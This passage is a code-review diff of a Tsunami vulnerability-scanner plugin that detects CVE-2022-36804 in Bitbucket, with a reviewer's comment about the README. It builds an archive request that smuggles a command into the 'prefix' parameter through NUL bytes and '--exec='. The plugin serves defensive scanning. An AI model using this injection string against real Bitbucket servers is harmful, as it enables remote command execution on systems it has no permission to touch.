community/detectors/bitbucket_cve_2022_36804/src/main/java/com/google/tsunami/plugins/detectors/bitbucket/Cve202236804VulnDetector.java

```diff
@@ -0,0 +1,212 @@
+        if (matcher.find()) {
+            String res = matcher.group(1);
+            JsonElement rootElement = JsonParser.parseString(res);
+            JsonObject repositoryPage = rootElement.getAsJsonObject();
+            if (repositoryPage.get("size").getAsInt() > 0) {
+
+                JsonArray values = repositoryPage.getAsJsonArray("values");
+                for (int i = 0; i < repositoryPage.get("size").getAsInt(); i++) {
+                    //Boolean isPublic = values.get(i).getAsJsonObject().get("public").getAsBoolean();
+                    JsonArray selfs = values.get(i).getAsJsonObject().getAsJsonObject("links").getAsJsonArray("self");
+                    Iterator self = selfs.iterator();
+                    while (self.hasNext()) {
+                        JsonElement hreflink = (JsonElement) self.next();
+                        publink = hreflink.getAsJsonObject().get("href").getAsString();
+                        return publink;
+                    }
+                }
+            }
+        }
+        return publink;
+    }
+
+    private String getArchiveLink(String publink, String commandToInject) throws MalformedURLException {
+        String archiveLink = "";
+        if (publink.length() == 0) {
+            return archiveLink;
+        } else {
+            URL url = new URL(publink);
+            archiveLink = "rest/api/latest" + url.getPath().substring(0, url.getPath().lastIndexOf("/")) + "/archive?format=zip&prefix=123%00--exec=" + commandToInject +
+                    "%00--remote=git@g.com/a/b";
+            //logger.atInfo().log("archiveLink urldecode %s ", archiveLink);
+            return archiveLink;
+        }
+    }
+
+    private DetectionReport buildDetectionReport(
+            TargetInfo targetInfo, NetworkService vulnerableNetworkService) {
+        return DetectionReport.newBuilder()
+                .setTargetInfo(targetInfo)
+                .setNetworkService(vulnerableNetworkService)
+                .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli()))
+                .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED)
+                .setVulnerability(
+                        Vulnerability.newBuilder()
+                                .setMainId(
+                                        VulnerabilityId.newBuilder()
+                                                .setPublisher("TSUNAMI_COMMUNITY")
+                                                .setValue("CVE_2022_36804"))
+                                .setSeverity(Severity.CRITICAL)
+                                .setTitle(
+                                        "CVE-2022-36804: Bitbucket Command injection vulnerability")
+                                .setDescription(
+                                        "A vulnerability in Bitbucket allows a remote, An attacker with access "
```

Comment:
Please change according to the changes you are doing to the README from my previous comments